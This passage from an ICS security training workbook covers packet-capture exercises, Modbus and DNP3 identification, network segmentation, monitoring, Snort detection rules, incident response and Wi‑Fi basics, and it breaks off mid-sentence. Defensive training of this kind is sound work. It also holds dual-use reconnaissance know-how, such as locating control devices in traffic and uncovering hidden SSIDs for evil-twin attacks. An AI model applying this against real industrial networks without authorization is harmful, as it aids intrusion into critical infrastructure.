Discover potential ICS packets. Explore a pcap file containing ICS network traffic. The
purpose of this exercise is to become familiar with a common tool for exploring
captured packets. There are many advanced tools for evaluating network traffic. How
do those tools work? By using windump, we can advance ourselves to comprehending
better what takes place at low levels. When evaluating a network, we will need to be capable of
understanding normal packet activity.
NOTE: This exercise is done virtually using Netlab. Before completing this exercise, view the Netlab
“How to” video located in this course.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid closing your VLP session.
2. Login and schedule a reservation for the Learning Objective 3: ICS Connectivity - Protocols
Activity 1.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
40 | P a g e
Lab Settings
The information in the table below will be needed in order to complete the lab. The task sections
provide details on how to use the information listed below.
Windows10 vmuser vmuser
To begin the exercise, click the Windows10 icon in the diagram or on the tab listed at the top, then
enter the password from table above.
Lab 1
1. Using windump requires the command line. It is not a graphical utility. To open a terminal to the
Windows command line, click the “Command Prompt” icon in the task tray. Maximize the
window.
2. You will see a blank terminal open. Type windump
3. Navigate to the Desktop directory.
cd Desktop
4. In here, you can run the dir command to confirm you are at the demo1.pcap file.
dir
5. Next, navigate to the demo 1 folder
cd demo1
6. Once here, you can run windump to blindly explore the pcap
windump -r demo1.pcap
7. The above command will cause the terminal to print every packet in the pcap file. This is too
much to look through by hand. If it is still running, cancel the output.
Consider:
ctrl-c
Just because you find
8. Let’s check for interesting port numbers – ones that may likely be
traffic with a port
Control Systems traffic.
number matching ICS
windump -r demo1.pcap port 102 protocols, does not
9. It seems something here is using Port 102, which is a possible sign necessarily confirm
of ICS related traffic as s7Comm uses Port 102. the existence of ICS
traffic. Closer
10. Try the above command again but replace 102 with different port evaluation will be
numbers. Access the TCP Ports used by PLCs document in needed.
Appendix C for a list of common Port numbers. See if you can find
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
41 | P a g e
other ICS related traffic. If windump prints lines, you have found more traffic. Keep looking for
different port numbers.
11. Let’s take a closer look at a specific host we saw using Port 102. We can isolate the host by IP.
windump -r demo1.pcap host 192.168.60.1
Notice this host is repeatedly communicating with Port 20000 to the host at 192.168.60.130
This is a common port for DNP3 protocol. In such a case, one would be the client, and the other
would be the control system device itself. How can windump show us which one is the control
system device? Look at the “>” between each IP per line. This output from windump shows us
that 192.168.60.1 is leaving on random assigned port numbers, and always heading toward
192.168.60.130 who is listening Port 20000. This is good evidence to assume that
192.168.60.130 is a control system device, operating with the DNP3 protocol.
What other ICS related port numbers did you find? List them below.
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
Packets and protocols demonstration using Wireshark:

Take any notes from the online demonstration: ____________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
42 | P a g e
Packets and protocols activity #2 Consider:
Discover functions of Modbus. The functions listed Exploring the components of
on the next page are normally carried inside Modbus manually exposes you to
Modbus packets that are carried over an ICS the structure of the protocol’s
network via the Modbus protocol. packet. Other protocols have
different structures. When
Lab 2
evaluating a network, seeing
Note: This exercise is done virtually using Netlab. Before what is normal provides
completing this exercise, view the Netlab “How to” video located in awareness. You now are seeing
this course. what messages normally take
place in this sample of traffic.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid
Doing this activity helps you
closing your VLP session.
become familiar with manually
2. Login and schedule a reservation for the Learning Objective exploring a protocol in real
3: ICS Connectivity - Protocols Activity 2. packets. This provides a baseline
for when there is a need to
3. Enter your reservation. troubleshoot a problem.
Lab Settings
The information in the table below will be needed in order to complete the lab. The task sections
provide details on how to use the information listed below.
Windows10 vmuser vmuser
To begin the exercise, click Windows10 in the diagram or on the tab listed at the top.
1. Open the demo2 folder on your Virtual Desktop. Double-click the demo2.pcap file. It will
automatically open into Wireshark. Attempt to find additional functions. Determine their function
ID number. You do not have to find every function. Some functions may not appear in the
provided pcap file.
When you find a function, you may find yourself scrolling through repeating events. Use Wireshark to
filter out the functions you have already discovered.
2. In the expression bar, type in the filter below for function Type 1. Change the 1 to any function
number you have already found. Press enter once the bar turns green. It will be red as you
type.
!(modbus.func_code == 1)
3. Function Type 1 will no longer appear. You can continue to add discovered functions as you go,
by using the && boolean.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
43 | P a g e
!(modbus.func_code == 1) && !(modbus.func_code == 2)
4. Keep adding to the filter as you go!
5. Check the box next to the function name as you discover them.
6. Place the ID number in the blank next to the function name.
ID# ___ write_multiple_coils ID# ___ write_multiple_registers
ID# ___ get_comm_event_counter ID# ___ read_discrete_inputs
ID# ___ read_holding_registers ID# ___ diagnostics
ID# ___ write_single_coil ID# ___ write_file_record
ID# ___ read_coils ID# ___ report_slave_id
ID# ___ read_exception_status ID# ___ encapsulated_interface_transport
ID# ___ get_comm_event_log ID# ___ read_input_registers
ID# ___ read_fifo_queue ID# ___ read_write_multiple_registers
ID# ___ mask_write_register ID# ___ write_single_register
ID# ___ read_file_record
1. Among the discovered functions, which ones appeared frequently? ______________________

___________________________________________________________________________
___________________________________________________________________________
2. Among the discovered functions, which ones did not appear frequently? __________________
___________________________________________________________________________
___________________________________________________________________________
3. Did any functions appear as unknown? ___________________________________________

___________________________________________________________________________
___________________________________________________________________________
4. Does the packet structure following the Function Code, appear different for each? __________
____________________________________________________________________________
____________________________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
44 | P a g e
Discover undesired activity demonstration

Take any notes from the online demonstration:
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
45 | P a g e
Network segmentation demonstration
A control system can exist on a single network. However, that may not be the wisest design plan. It is a
single network to target. Instead of a single network, smaller networks connected by routes, performed
by routers or firewalls, can provide barriers with rules. This is a common concept in network security.
Network security can be applied to control system networks.
Let’s look at simple network,

built with no segmentation.
This is a relatively simple ICS
network. A couple of PLCs
driving some factory
equipment, a pair of HMI
stations to operate from, and
a Historian collecting data
from the operation and storing
it to a server for safe keeping.
This is a single network.
Nothing is segmented. All
devices above and below the
network pipe are connected to
the same low-level network.
Over time, more devices

become needed or desired.
This company adds some
engineering workstations for
new crew positions. Policies
are implemented that require
more security, resulting in new
IP surveillance equipment.
Where do these new devices
connect? The company just
adds to the existing one.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
46 | P a g e
Production is going well. More
workforce is needed. New
employees will need desktop
computers. To serve the
various departments, an IP
phone system is deployed.
A dedicated IT staff is
eventually needed. To support
staff, a Domain Controller is
set up and integrated with
desktops and equipment.
Employees need to store and
exchange a variety of files on
a File Server. Being able to
view the data from production
can be complicated, so IT
creates a web server to make
it presentable in visually
appealing dashboards. The
data for the dashboards is
pulled from the Historian
database.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
47 | P a g e
More advanced OT equipment
is needed in manufacturing.
New components are
deployed, resulting in more
servers and operation client
terminals.
Finally, the employees are

going to need Internet access
for communicating with
businesses. All these
additions are added to the
same base network we
started with. It is getting
crowded on this network. Our
network is singular, and now
only 1 device isolates this
Control System from the
public Internet.
The resulting network appears rather crowded:

 Forward or reverse attacks need only circumvent one point
 Difficult to control access across employee positions
 Troubleshooting may be challenging
 Difficult to grow
Let’s attempt to segment this…but how?
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
48 | P a g e
There is no single answer for how to segment such a network. Below is one idea. It is an architecture
design provided by DHS. Dividing networks into zones can assist in creating security boundaries.
Understanding how to segment networks is vital to creating architectural zones within and around
control system environments.
The basic idea is to introduce a DMZ between IT and OT operations. This idea can be applied in
multiple areas of the same production, depending on needs. It creates the ability to introduce access
control between segments. Not all segmenting ideas require placing a DMZ buffer between them.
Debate over the relevance of the Purdue Model does exist. Depending on your organization’s design
needs, it can give or take value from this debate. Regardless, using it can still be a first step in further
improving your security model. It can also be a great introduction to someone who has never
experienced Network Segmentation.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
49 | P a g e
Looking back at the same network we saw grow, we attempted to segment this into smaller, more
controllable zones. When evaluating a network, you may or may not encounter similar designs.
Critical Data Points

With a segmented network design, we can more easily add new components to the network. These
new components now have an appropriate location where they can be placed.
A production network will have data paths throughout itself. These paths can be critical points for data
to traverse.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
50 | P a g e
A security officer can monitor last night’s surveillance video, which was delivered to video storage.
Note the direction of the arrows indicating which device is initiating the connection, and where it is
going for access. In other words, the video footage is not pushed from the Production network to the
engineering workstation. It is accessed by via the access controls available in the segmented networks.
These data paths traverse firewalls with access rules.
Historian data are sent to another Historian to mirror the data. A backup is replicated for long term
storage.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
51 | P a g e
An engineer monitors the past week’s results from production by accessing a web server. The web
server accesses the database mirror for the engineer’s queries. It does not query the primary Historian
in the Production network. The web server can do this, even though the networks have been
segmented.
Logical vs Physical location. When reading this map, the segments do not necessarily suggest physical
placement. Note the colored highlights, and the matching physical room name. When reading our
network segmentation map, this can illustrate how different hosts connected to a common segment, are
not actually in the same room next to each other.
The above are achieved more realistically, by the implementing Network Segmentation.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
52 | P a g e
Real-world segmentation example #1:
Ukrainian Kyivoblenergo Power Grid December 23, 2015
• Open-source information available from RTU vendors.
• VPNs (plural) into the ICS network, lacked multi-factor authentication.
• Firewall allowed egress, aiding remote connectivity.
• No network security monitoring.
Result: Power interruptions to 225,000 customers, across various locations.
Real-world segmentation example #2:

RWE AG Power Plant April 26, 2016 (media reported)
• Infected with W32.Ramnit and Conficker
• USB drives also discovered, containing copies of same malware.
• Infected ICS hosts were on normally isolated networks.
• Infected Office hosts, passing the USB drives, were also on isolated networks.
Result: Lack of Internet connectivity for the ICS segments, rendered the infection harmless.
Cybersecurity increased upon discovery, without being overwhelmed.
Network segmentation exercise Consider:

Review the network diagram on the next page. If you Rather than designing a
were given this map in an evaluation situation, what perfect ICS network, simply
ideas come to mind? Answer the questions below. try to consider a model that
There are no right or wrong answers. may offer potential for more
access control, efficiency,
and growth. You are
Does the design implement any segmentation? learning to evaluate a
situation. Reviewing bad
_________________________________________________________ ideas is a great way to
notice them
_________________________________________________________
_________________________________________________________
Do you see any critical data points?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
53 | P a g e
Are some devices arguably in the wrong network?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
If a particular host was compromised, are there sensitive devices nearby in the same network
segment?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
What are top concerns that stand out to you?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
If you were to segment this network further, what would you create? Use the blank space on the
following page draw and label your ideas for further segmenting this network. Remember, there is no
right or wrong answer. Simply trying is a great way to start.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
54 | P a g e
55 | P a g e
56 | P a g e
Return to the learning portal and continue with the next video.
57 | P a g e
Network segmentation exercise recap
Take any notes from the
recap:_____________________________________________________________________________
_____
__________________________________________________________________________________
__________________________________________________________________________________
Packets, protocols, and segmentation recap
 Are dependencies and critical functions for delivery of critical services established?
 Does the control system enforce assigned authorizations for controlling the flow of information
within the system and between interconnected systems in accordance with applicable policy?
 Does your organization configure the control system to provide only essential capabilities and
specifically prohibits and/or restricts the use of functions, ports, protocols, and/or services as
defined in an organizationally generated "prohibited and/or restricted" list?
 Is a cybersecurity architecture in place to enable segmentation, isolation, and other
requirements that support the cybersecurity strategy?
 Is cybersecurity defense-in-depth architecture implemented?
 Is a strategy to architecturally isolate the organization's IT systems from OT systems
implemented?
 Is architectural segmentation and isolation maintained according to a documented plan?
 Is the network segmented based on the label or classification level of information stored on
servers?
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
58 | P a g e
 Existing staff has technical capacity to operate the existing implementation, but not
recreate it.
 Staff does not have knowledge of Control System network traffic in detail.
 Packets are believed to be captured for analysis but are not capturing correctly.
 Documentation struggles to exist, due to continued irregular adjustments to the existing
design.
 Purdue model, or similar segmentation, is not observed in the network.
 Public traffic can be accessed from OT based network hosts.
 Critical data points are not understood.
 Restarting a system is only known solution to combating a critical data flow issue.
 Fear of debugging systems exists across the IT and OT staff.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
59 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
60 | P a g e
Evaluate network monitoring capabilities
Monitoring systems and networks for changes, anomalous behaviors, or attack signatures can be
difficult in an ICS environment; however, monitoring and detection capabilities are essential to the
defense-in-depth concept of protecting critical assets. In this objective (remaining in Step 3) we
reinforce the importance of network monitoring and how you can evaluate your network using these its
capabilities.
“The collection, analysis, and escalation of indications and warnings to detect and respond to
intrusions. NSM is a way to find intruders on your network and do something about them before they
damage your enterprise.”
- The Practice of Network Security Monitoring
Having an electronic boundary around the ICS is not sufficient to protect critical assets from
unauthorized access. This is true because for each protection put into place in a network environment,
threat actors can find a method around it.
ICS environments provide a unique opportunity when considering protection mechanisms to place on
the network. Despite considerable network traffic, that traffic is very predictable. For example, in a
typical ICS environment, the PLC communicates in a standardized way with the HMI and the historian;
all applications and services on the process control system (PCS) network are known (or should be);
and the protocols, web traffic, and proprietary traffic are known and predictable.
Asset owners can use an intrusion detection system (IDS) solution to easily monitor and create alarms
for any traffic outside normal operations. An IDS is based on the passive monitoring of network traffic.
Expected network traffic is deterministic, and deviations are used as triggers for alerting. Simple rules
can be written to monitor for IP sources and destinations, protocols, lengths of packets, etc.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
61 | P a g e
Philosophies
“ … Know thy Network” (Rob Joyce, TAO, 2016)
“Defense is doable …” (Rob. M. Lee, Dragos)
“Logs are just data... Processed and analyzed, they become information. Put another way ... If a tree
falls on your network and it shows up in your logs and nobody is reading them – you’re still
squished!” (Marcus J. Ranum)
Network monitoring types
1. ____________ ________________ silently analyzes network traffic through a span port or tap
to identify endpoints and traffic patterns.
• NIDS/HIDS
• Full packet capture
• Centralized logging
2. ____________ ________________ works by sending test traffic into the network and polling
endpoints with which that traffic it comes into contact.
• Scanning – Nmap or Nessus
• PenTesting
• System Monitoring
• Policy based – Whitelisting, GPO, Tripwire, Fi
3. ____________ ________________ For an ICS to be successful, a hybrid monitoring solution is
needed. OT environments require both passive and active monitoring to be effective.
• Security information and event monitoring (SEIM)
4. ____________________!!!
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
62 | P a g e
Logging architecture
 A central log server can

assist in threat
identification or incident
investigation by
providing a
chronological list of
events – providing a
more complete, bigger
picture.
 Correlating with other
logs can sometimes
make the difference
between recognizing an
event for what it is (true
or false) and then
acting accordingly.
 Physical Security logs
can help to identify an
insider threat that has
physically accessed the
computer systems.
63 | P a g e
 In this example, we
send our logs to
the central control
centers and field
devices to an ICS
Log Server.
 The ICS Log
Server forwards
data to the
Centralized Log
servers
 These Log servers
should be placed in
a high security
area of the
network.
64 | P a g e
 Does the organization deploy network-based IDS sensors and log servers on Industrial DMZ
systems and ICS networks that look for unusual attack mechanisms and detect compromise of
these systems?
 Does the organization deploy SIEM or log analytic tools for log aggregation and consolidation from
multiple machines and for log correlation and analysis?
 Are malicious code protection mechanisms used at system entry and exit points and at
workstations, servers, or mobile computing devices?
Network IDS monitoring demonstration

Draw the appropriate placement of the IDS Sensors from the demonstration on the image below.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
65 | P a g e
Detection and monitoring
Monitoring control system
 Monitoring and management of control system
 Devices, protocols, communications, user accounts, product/Firmware versions, device
settings
 Host intrusion detection
 Network intrusion detection
 Protection of control system
 Boundary and security zone firewalls
 Application Whitelisting
 Compliance audit and change management
Evaluating network monitoring
 AU-6 - Audit Review, Analysis, and Reporting – consistently part of the top 20 for NCATS.
a. Reviews and analyzes information system audit on at least on a weekly basis for
indications of inappropriate or unusual activity; and
b. Reports findings to organization-defined personnel or roles.
 Additional Guidance
a. Process Integration
b. Correlate Audit Repositories
c. Integration of Scanning and Monitoring Capabilities
d. Correlation of Physical Monitoring
 Policy needed to govern review of log data analysis
Network monitoring policy
 Log and Monitoring Policy should define:
 Purpose of monitoring and logging
 Who is responsible for audit logging and review?
 Frequency of log and audit review
 Requirements for system owners
 Activities to be logged (Systems, Applications)
 Format of logs and Storage
 Protecting logs from risk
 Administrative Responsibilities
 Who would you ask about your company’s policy?
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
66 | P a g e
Data
There are many data types and collection tools. A few of which are listed in the table below:
Log sources
Below are some commonly used logs, many of which are used in ICS environments. ICS vendors may
be able to provide additional information on application specific logs or third-party tools.
• Firewalls
• IDS Logs (Zeek and Snort)
• VPN Servers (may be part of Firewall logs)
• Operating Systems (e.g., Windows, *nix, Mac)
• Proxy Server
• Web Servers (e.g., IIS, Apache, Nginx)
• Databases (e.g., MS SQL, Oracle, MySQL)
• Other (e.g., PLCs, HMIs)
Snort rules for ICS vulnerabilities
Snort is an open-source deep packet inspection intrusion detection system (IDS) or intrusion prevention
system (IPS). Snort is widely used and has become the standard for IPS/IDS. Learning to write Snort
rules is useful because most IPS/IDS applications will either use the Snort rule format or provide a way
to import Snort rules.
In an ICS environment, Snort is beneficial to ensure expected commands are being sent to your
devices. Snort has ICS-specific preprocessors that enable you to easily identify functions from Modbus
and DNP3 on your network. The following links provide more information about the Modbus and DNP3
preprocessors: https://www.snort.org/faq/readme-modbus, https://www.snort.org/faq/readme-dnp3
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
67 | P a g e
In an ICS environment, network communication is relatively static as opposed to the more dynamic
nature of an IT environment. It is easier in ICS environments to define what IP addresses should be
communicating with the PLC or HMI than with a file server in the IT network. The communications are
well defined and do not change often, if ever. The static nature of the ICS environment makes it easier
to user Snort to detect the following:
 Detect non legitimate communications
 Find if unauthorized commands are being used
 Detects common suspicious activity on network
Snort can read packet capture data. New rules can be written and run against existing data to test or
look for specific network traffic in previously captured data. In the next section, we will provide a quick
refresher on Snort preprocessors and rule writing materials from 301, and then take it a step further by
having you write your own rules.
Example ICS Snort rules
Snort rules for ICS operation

Check for write or delete operations not being sent by the master station: The following Snort rule can
be used to check this behavior, assuming the HMI IP address is 1.1.1.1:
alert tcp !1.1.1.1 any -> any (msg:"Someone trying to write or delete to
RTU"; dnp3_func:write,delete_file; sid:1;)
Check for “stop applications” commands not being sent by the master station: This is very dangerous if
sent broadcast to all RTU:
alert tcp !1.1.1.1 any -> any any (msg:"Someone trying to stop the
applications of an RTU device"; dnp3_func:stop_appl; sid:1;)
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
68 | P a g e
What to monitor?
 ________________________
 ________________________
 ________________________
 ________________________
 ________________________
 ________________________
 ________________________
 ________________________
Network monitoring concerns
False positives - a legitimate network event that has been alerted by the solution as a potential
problem.
False negative - a malicious event that occurred but was not detected by the security architecture.
Unknown – Events that occur that are not expected or recognized.
 Is event data aggregated and correlated from multiple sources and sensors?
 Are system audit records reviewed and analyzed on a defined frequency, and are findings
reported to designated officials?
 Are the events to be audited adjusted within the system based on current threat information and
ongoing assessments of risk?
 Is the network monitored to detect potential cybersecurity events?
 Are the evaluation results to be correlated to a framework? NIST/CIS??
Logging and monitoring exercise

Take any notes from the online activity: ____________________________________
____________________________________________________________________
____________________________________________________________________
________________________________________________________________________________
Wazuh demonstration
Take any notes from the online demonstration: ___________________________________________
_________________________________________________________________________________
_________________________________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
69 | P a g e
Incident response
How is incident response supposed to work?
Incident response plan

1. ____________________________
2. ____________________________
3. ____________________________
4. ____________________________
5. ____________________________
6. ____________________________
7. ____________________________
8. ____________________________
9. ____________________________
“Developing an Industrial Control Systems Cybersecurity Incident Response Capability”, DHS, October
2009
Incident response questions

 Does the organization have written incident response procedures for the ICS Network that
include a definition of personnel roles for handling incidents?
 Does the organization maintain third-party contact information to be used in security incident
reporting?
 Does the organization ensure incident handling team personnel understand current threats and
risks, as well as their responsibilities, by conducting periodic incident scenario sessions?
 Are auditable events adequate to support after-the-fact investigations of security incidents?
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
70 | P a g e
Incident response exercise
Using your company, complete this Contact List. This will give you a head start when
you go back to work and start your own Analysis and Evaluation.
Network Monitoring and Incident Response

Evaluation Contact List
Company Name
________________________________________________________________________
1. Who is ultimately responsible for ICS Security in your company (Could be the
CSO/ISSO/CISO)? This is the person you must communicate with to evaluate your
OT environment.
_________________________________________________________________________
2. Are you responsible for network monitoring in your company? If not, who is? This
person(s) will know about the IDS sensors, logging, SEIM, tools, etc. used in
monitoring the OT Network.
_________________________________________________________________________
3. Does a network map exist that shows the location of network IDS systems? If not,
who knows where the sensors are located? Where are the centralized log servers
located and which systems are logging to them?
________________________________________________________________________
4. Who is responsible for ensuring all OT Systems are sending logs to a central log
system or SIEM?
_________________________________________________________________________
5. Is there a separate Incident Response Plan for OT? Who is responsible for
maintaining and updating this plan?
_________________________________________________________________________
6. Who is responsible for conducting Incident Response exercises in your company?
_________________________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
71 | P a g e
Detection and monitoring recap
Review
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
72 | P a g e
Wireless in ICS environments
Many, many Wi-Fi enabled devices exist – some of which we are not even aware of. As such, it is
important we take wireless devices into account in our evaluations. In this section, still working in Step
3, Determine ICS Connectivity, we will discuss wireless evaluation concepts, tools, and analysis.
Concepts, tools, and analysis
 High-level Wireless Communications Discussion
 IEEE 802.11 Protocols, a.k.a., Wi-Fi, and Threats
 IEEE 802.15 Protocols & Threats
 Packet Capture Tools
 Aircrack-ng, Kismet Wireless, and other tools
 Packet Analysis Tools
 Wireshark, Custom Scripts, and other tools
Radio spectrum
The image below depicts the frequency allocation map of the U.S. radio spectrum. Other frequency
allocation maps exist for other countries as they use other parts of the spectrum differently than the
U.S. However, most of the world uses the same frequencies as the U.S.
https://www.ntia.doc.gov/files/ntia/publications/2003-allochrt.pdf
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
73 | P a g e
Omni-directional antennas
When transmitting, an Omni-directional
antenna transmits in the shape of a donut –
meaning it will transmit Radio waves in all
directions. Think of it like a lightbulb. If you
were to connect a lightbulb to a lamp in the
middle of a room, the light would emanate in
every direction, including upward. The same
is true of an Omni-directional antenna, except
the radio waves will also travel through walls
and glass and be received by radio devices in
other rooms. Omni-directional antennae can
also transmit as far as a mile with Wi-Fi.
Additionally:
 The closer you get to the transmitting
antenna, the higher the power level.
 Most devices, including cell phones, Wi-Fi access points, laptops, etc., incorporate some form of
an Omni-directional antenna.
 Omni-directional signals are not easily located as they have the potential to come from just
about anywhere.
Directional antennas
Unlike an Omni-directional antenna, a directional antenna can only transmit in one direction. Think of a
directional antenna like a type of flashlight. When you turn on a flashlight you can only send light in one
direction.
There is some residual light that shines
behind the flashlight but most of the light
can be seen in front. A directional antenna does something
similar. It can transmit in one direction and receive from one
direction. It can receive from behind, but like a flashlight, the
signal will much weaker.
A directional antenna is very useful in locating a transmitter
because when it is pointed in a certain direction, it will only
receive a signal from that direction. If monitoring the power level
of transmitted signals, the levels will rise significantly as the
antenna is pointed in the direction of a transmitting device. It is
very effective in giving you a general direction of a transmitted
signal.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
74 | P a g e
Wi-Fi access points (AP)
As indicated, there are a number of devices with Wi-Fi built into
them. What we have found at locations around the country is
Wi-Fi access points built into industrial equipment that was not
expected, such as fuel processing and delivery, building access
controls, and package delivery systems. Each had either no
encryption nor authentication, or very weak security. We
recommend configuring the Wi-Fi access point, so it is using
some form of encryption, and not a default password.
As you well know, Smart phones can be used as a Wi-Fi
hotspot as well. Most the time these are secured. In rare cases, however, someone will leave their Wi-
Fi hotspot on and configured with no security. We still see many Smart phones with their hotspots
turned on, and unsecured, unbeknownst to the user. You may see this in an airport or other areas, and
it will say something like “Bob’s iPhone.”
IOT devices are very prevalent and are used as subcomponents of a system, such as appliances and
industrial equipment. One very popular device is the ESP8266, which can contain a full Wi-Fi access
point communications stack and provide full Wi-Fi functionality.
Of course, late model vehicles also contain Wi-Fi, Bluetooth, etc. Rental cars have the potential to pose
a threat of malware delivery if these facilities are used.
Wi-Fi spectrum
There are two spectrum bands on which Wi-Fi runs. The first, and most popular, is 2.4 GHz, which
operates from around 2.412 GHz to 2.495 GHz. There are 11 channels in the U.S. and 14 channels in
other countries (for example, Japan). The main channels in use in the U.S. are Channels 1, 6, and 11.
Other channels can be used, but most people do not use them due to overlapping issues, which can
cause network congestion if the two APs are in close proximity. There is even more congestion went
two wireless APs are using the same channel in close proximity. Most default to Channel 6, and so we
find that most operators and users plug-in a wireless access point, configure the name, leave the
channel alone, and cause congestion or interference on their networks. Other channels can be used as
long as the channels are not overlapping.
For 2.4 GHz bands, the
channel width is usually
20-40 MHz depending on
the wireless AP
manufacturer and the
IEEE 802.11 protocol
being used.
Source: https://i.stack.imgur.com/ymo5p.png
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
75 | P a g e
The second spectrum band
Wi-Fi runs is 5 GHz. There are
24 channels at 20 MHz and 11
at 40 MHz 5 GHz bands have
20 MHz channels, but also
even wider channels up to 160
MHz for more bandwidth and
throughput. Basically, the AP
uses a larger pipe to send data
(and possibly multiple
antennas) to transmit on a
wider channel.
Wi-Fi encryption types
Open – No encryption.
Wired Equivalent Privacy (WEP) – Developed in 1997 and proven to be weak and easily
breakable. An attacker can break through it in a matter of minutes.
Wi-Fi Protected Access (WPA) – Developed as a second-generation to WEP. Additional

encryption was applied to the same algorithms, but it’s not much stronger than WEP.
Wi-Fi Protected Access Version 2 (WPA2) – A complete rewrite of the algorithm in

2004. Worked for a number of years without problem, but there are some issues with it.
Wi-Fi Protected Setup (WPS) – Uses an 8-digit code to protect the passing of a secret
key between two parties (usually the AP and the connecting device such as a laptop).
Wi-Fi Protected Access Version 3 (WPA3) – Next generation of WPA. Provides many
updates to protect users, such as stronger encryption and better password usage.
Wi-Fi CERTIFIED Enhanced Open – A Wi-Fi alliance certification that preserves the
convenience open networks offer while reducing some of the risks.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
76 | P a g e
Beacons
An AP is constantly broadcasting its own information, so clients are aware of its existence. This
broadcast is called a beacon so devices such as smart phones, laptops, and tablets will be able to
access it and know about its capabilities. The broadcast typically transmits every 50 to 100 ms,
depending on configuration. This broadcast usually contains the name, the source MAC (BSSID),
destination MAC, power, channel, encryption type, cipher type, auth type, name (ESSID), and some
other items.
Wi-Fi clients do not transmit the beacon unless they are acting as a hot spot or AP. As such, a client
does transmit when it is trying to find an AP. When a client sees an AP, it will attempt to connect to it
from a list of APs it has connected to in the past. Otherwise, it will list the known APs to the user in the
immediate area where it is receiving a signal.
Probe request
Usually, when the Wi-Fi client is not connected to an AP, the client will send out probe requests in two
ways:
 A general broadcast to all APs in RF range (FF:FF:FF:FF:FF:FF) to get a response from any AP
 A probe request to a specific AP by ESSID and by MAC address.
In a general broadcast, all APs respond with a Probe Response that looks very similar to a Beacon.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
77 | P a g e
In a Probe Response from a specific AP, the request is ignored by all APs whose name and/or MAC
address do not match. It is also addressed to the specific client that made the request, even though all
others can still see both the request and the response.
This means that when operating in monitor mode, an adversary could discover more information about
a client’s/victim’s whereabouts or internal Wi-Fi APs not necessarily meant for public consumption.
Non-broadcasting APs attempting to hide the SSID can have their SSID revealed by clients performing
probe requests. The SSID is revealed whenever a client attempts to connect to the AP, which by
protocol, always sends the SSID in clear-text as the encryption key-exchange has not occurred yet.
Capturing specific AP probe requests is quite helpful to an Evil Twin attacker since it contains the SSID
and the MAC address of the intended AP. Both Aircrack-ng and Kismet can correlate captured SSID
names to AP MAC addresses attempting to hide and uncover hidden SSIDs.
It is a good idea to turn off the Wi-Fi, Bluetooth, and Location awareness on clients that do not need the
connectivity at certain moments of the day. Plus, it saves on battery power since the client is constantly
transmitting probe requests and processing probe responses while client Wi-Fi is turned on.
Example airodump-ng capture
Source: question-defense.com
The above image shows data captured from the beacons broadcasted from wireless APs. As you will
notice, the screen is currently on Channel 6 and we have columns of data.
 The first column is the BSSID (Basic Service Set ID) or the MAC address of the wireless access
point radio.
 Second column is the power in dBs. The higher the number, the higher the signal strength. For
example, -47 is larger than -70 so the access point is either more powerful or closer. The
negative scale usually throws people off into thinking the larger absolute value numbers are
bigger than smaller absolute numbers.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
78 | P a g e
 The beacons column is a count of the number received by this capture so far.
 The channel (CH) column tells you on what channel the beacon is broadcasting. As you can see
all the beacons here operate on Channel 6.
 The MB column is basically the megabits-per-second of the access point.
 The ENC column is the encryption type. As you can see, all the encryption types are
represented in this hypothetical example. You can see WPA2, WPA with TKIP, WEP, and open
or OPN.
 The ESSID column is the name of the access point. The name only shows up if the access point
is broadcasting the name. Some access points are configured to no broadcast the name. The
